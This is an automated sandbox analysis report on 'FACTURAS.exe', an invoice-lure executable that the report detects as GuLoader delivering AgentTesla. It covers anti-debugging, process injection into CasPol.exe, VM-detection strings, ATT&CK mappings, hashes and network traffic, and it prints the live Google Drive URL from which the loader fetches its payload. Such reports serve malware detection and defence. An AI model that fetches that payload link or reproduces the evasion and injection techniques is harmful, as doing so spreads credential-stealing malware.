Source: CasPol.exe, 00000006.00000002.22637364540.0000000000FD8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWM
Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000006.00000002.22637364540.0000000000FD8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T
Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\FACTURAS.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\FACTURAS.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: E10000

Jump to behavior

Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"			Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"			Jump to behavior

Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmp	Binary or memory string: Program Manager]\
Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp

Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5196, type: MEMORYSTR

Source: Yara match	File source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5196, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5196, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Masquerading1	OS Credential Dumping	Security Software Discovery431	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion341	Security Account Manager	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	System Information Discovery114	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FACTURAS.exe	41%	Virustotal		Browse
FACTURAS.exe	38%	Metadefender		Browse
FACTURAS.exe	58%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Virustotal		Browse
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
http://kFWRbv.com	0%	Virustotal		Browse
http://kFWRbv.com	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.181.238	true	false	high
googlehosted.l.googleusercontent.com	142.250.181.225	true	false	high
doc-0g-7s-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju06nhfef03e9jkahgn04c8qp1/1639485750000/01707528263340534167/*/1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://doc-0g-7s-docs.googleusercontent.com/	CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	false		high
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.google.com/	CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmp	false		high
https://drive.google.com/st	CasPol.exe, 00000006.00000002.22636737249.0000000000F58000.00000004.00000020.sdmp	false		high
https://doc-0g-7s-docs.googleusercontent.com/e	CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	false		high
https://doc-0g-7s-docs.googleusercontent.com/1	CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	false		high
http://kFWRbv.com	CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doc-0g-7s-docs.googleusercontent.com/u	CasPol.exe, 00000006.00000003.21845391885.0000000000FEC000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	false		high
https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju	CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	CasPol.exe, 00000006.00000003.21840136475.0000000000FDF000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.21840238765.0000000000FEC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.238	drive.google.com	United States		15169	GOOGLEUS	false
142.250.181.225	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	539521
Start date:	14.12.2021
Start time:	13:39:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FACTURAS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/2@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 84% Number of executed functions: 35 Number of non-executed functions: 15
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 20.93.58.141, 20.82.19.171 Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:42:46	API Interceptor	417x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	Invoice and documentsfdp.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	FACTURA COBRADA,pdf.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	Z09_46708.htm	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	FACTURAS.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	Kitap.2021.2022 .xls	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	SWIFT_ACK-89813.02.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	np8fBjShg2.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	4kW905r7N8.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	np8fBjShg2.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	ucGJxkkg2b.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	n0rVANBRCz.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	5mbFrXCn6a.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	ucGJxkkg2b.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	n0rVANBRCz.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	5mbFrXCn6a.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	inv-334179_for_Dot_AKSvDlcYNuHLyAshxhuWCLGosqSDRJOrHVSzXpoKNyUimpSuSm.html	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	yElHjOjgxQ.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	Z2O6h1SCNr.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225
	Z2O6h1SCNr.exe	Get hash	malicious	Browse	142.250.181.238 142.250.181.225

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\M9XgMRXaN30mgEl56ja236 Download File
Process:	C:\Users\user\Desktop\FACTURAS.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:1ln:v
MD5:	34F45818F16D1BBB62BA5874B8814CC7
SHA1:	A454CA483B4A66B83826D061BE2859DD79FF0D6C
SHA-256:	DC765660B06EE03DD16FD7CA5B957E8C805161AC2C4AF28C5A100AB2AB432CA1
SHA-512:	65711C8D556639DDFC14CE292B2415F3A2824D003AF1A530093B8E0B70B695E6C639694B7B90C6750B1129566D9A3784ED274667988D4B227DB2AC9B6CF7548B
Malicious:	false
Reputation:	low
Preview:	....

C:\Users\user\AppData\Local\Temp\~DF503944F8FF7253A1.TMP Download File
Process:	C:\Users\user\Desktop\FACTURAS.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.365570111635911
Encrypted:	false
SSDEEP:	48:rCXH5P26XpZKfAujEnkmHE+dJ+//iaBnF6UmkM:EHrZedAnjHrMyaL61
MD5:	E5AAF1474D5E7489F86A267B928DE425
SHA1:	8DAC741F82956D6111A5B442442E095DC4FC3299
SHA-256:	DBBEF5EC504CF458770890AF07448ABF835345029D078D4BA36CBF431F86314E
SHA-512:	B9AE66432026ADF7FE691F6E95292C6299CFE37FDC27760AD8DB5464386663A0398E53A770B0C8CCFDD734A8162064FF2D01093197A3BEC7356E9933EC344961
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.04128986675064
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FACTURAS.exe
File size:	147456
MD5:	2332fdde9344114749db5496eef5f5f9
SHA1:	303c40dd112294dc012836be48eb38e8af056432
SHA256:	0e693b9dcb4ccb3e64cb61396447dd4e3871234b4af80c2d57e4fbc9b6268a61
SHA512:	7b3d94fb5e12a09f1b417e8042cbb0abe394a1d577a466cd2394e9aa0068ab276d5da25edf742660edb8bd01611f4680c982d6f14373d80e2896d34a887379c1
SSDEEP:	1536:nVas/8YOk4FOHBbmpBpQr9nV43XExeM0Jw52P3u1D6CqljbW:Is/8YJ4kRmpBpqVC090JS63hN
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....e`V.....................0............... ....@................

File Icon


Icon Hash:	0cceececceece400

Static PE Info

General
Entrypoint:	0x401698
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x566065B6 [Thu Dec 3 15:54:30 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	98b6dd560a57b8960045d82e7d77c431

Entrypoint Preview

Instruction
push 004020ACh
call 00007F158C92F833h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
js 00007F158C92F838h
rcl byte ptr [ecx-65h], cl
fsubr dword ptr [edx]
dec eax
cmpsd
mov ebp, 0FAA5268h
pop eax
stc
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
popfd
aam 00h
das
mov al, byte ptr [69676445h]
jc 00007F158C92F874h
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add byte ptr [ebx], dl
pop esi
push es
sal byte ptr [ebx-76h], cl
inc ebp
lodsb
pop esp
pop esi
jmp 00007F158C92F814h
pop ebp
mov bh, 60h
xor eax, 0FA504B7h
mov ebp, eax
inc ebx
xchg eax, edi
xor edi, dword ptr [DAF603FAh]
outsd
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc cl, byte ptr [ecx]
add byte ptr [eax], al
or eax, 00000009h
push es
add byte ptr [ecx+65h], bl
jc 00007F158C92F8ADh
jnc 00007F158C92F873h
add byte ptr [67000801h], cl
jc 00007F158C92F8A3h
insb
imul ebp, dword ptr [esi+65h], 00011900h
inc edx
add byte ptr [ebx], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20fb4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0xc6c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x208	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20638	0x21000	False	0.363976680871	data	5.21775436592	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x1238	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0xc6c	0x1000	False	0.484130859375	data	4.2105621782	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x243c4	0x8a8	data
RT_GROUP_ICON	0x243b0	0x14	data
RT_VERSION	0x240f0	0x2c0	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, __vbaPut3, _adj_fdiv_m64, __vbaFpCDblR8, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	MURAL
InternalName	SERVICEKONTRAKTS
FileVersion	1.00
CompanyName	MURAL
LegalTrademarks	MURAL
ProductName	MURAL
ProductVersion	1.00
FileDescription	MURAL
OriginalFilename	SERVICEKONTRAKTS.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2021 13:42:35.224447966 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.224529028 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.224703074 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.241461039 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.241523027 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.293607950 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.293849945 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.295785904 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.296009064 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.414314032 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.414377928 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.415005922 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.415148020 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.418461084 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.459894896 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.899518967 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.899679899 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.899720907 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.899864912 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.899904013 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.900017023 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.900043011 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.900115013 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:35.900150061 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.900222063 CET	49803	443	192.168.11.20	142.250.181.238
Dec 14, 2021 13:42:35.905185938 CET	49803	443	192.168.11.20	142.250.181.238
